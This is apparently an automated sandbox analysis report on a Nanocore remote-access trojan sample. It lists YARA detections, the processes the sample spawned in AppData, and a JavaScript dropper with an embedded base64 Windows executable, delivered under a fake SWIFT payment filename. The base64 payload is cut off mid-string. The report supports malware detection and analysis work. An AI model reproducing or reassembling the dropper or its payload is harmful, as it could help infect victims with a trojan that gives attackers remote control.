Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.279567061.0000000000608000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: NanoCore, Description: unknown, Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.290934640.0000000002480000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.292248425.0000000004912000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.291265267.000000000351C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: NanoCore, Description: unknown, Source: 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.291187463.0000000002530000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.291265267.00000000034E1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: fdqkbs.exePID: 5316, Parent PID: 5336

General

Target ID:	8
Start time:	12:37:24
Start date:	02/02/2023
Path:	C:\Users\user\AppData\Local\Temp\fdqkbs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fdqkbs.exe"
Imagebase:	0x400000
File size:	76800 bytes
MD5 hash:	34037A20C292EAB6F90C3D9AB1334348
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: syhbwgs.exePID: 4612, Parent PID: 3452

General

Target ID:	11
Start time:	12:37:27
Start date:	02/02/2023
Path:	C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe" "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD
Imagebase:	0x400000
File size:	76800 bytes
MD5 hash:	34037A20C292EAB6F90C3D9AB1334348
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 3360, Parent PID: 5316

General

Target ID:	12
Start time:	12:37:29
Start date:	02/02/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 624
Imagebase:	0x1360000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 3228, Parent PID: 4612

General

Target ID:	14
Start time:	12:37:30
Start date:	02/02/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 656
Imagebase:	0x1360000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: syhbwgs.exePID: 1808, Parent PID: 3452

General

Target ID:	21
Start time:	12:37:37
Start date:	02/02/2023
Path:	C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe" "C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppD
Imagebase:	0x400000
File size:	76800 bytes
MD5 hash:	34037A20C292EAB6F90C3D9AB1334348
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4756, Parent PID: 1808

General

Target ID:	23
Start time:	12:37:38
Start date:	02/02/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 628
Imagebase:	0x7ff7a4ea0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Code Analysis

JavaScript Code

Call Graph

Executed
Not Executed

Script:

Code
0	try
1	{
2	String.prototype.endsWith =
3	function (needle) {	"C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe".endsWith(".jar") ➔ false "C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe".endsWith(".vbs") ➔ false "C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe".endsWith(".wsf") ➔ false
4	var emp = this.substr ( this.length - needle.length );	C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe.substr(66) ➔ ".exe" C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe.substr(66) ➔ ".exe" C:\Users\engineer\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe.substr(66) ➔ ".exe"
5	return emp == needle;
6	};
7	var aso_ibora = "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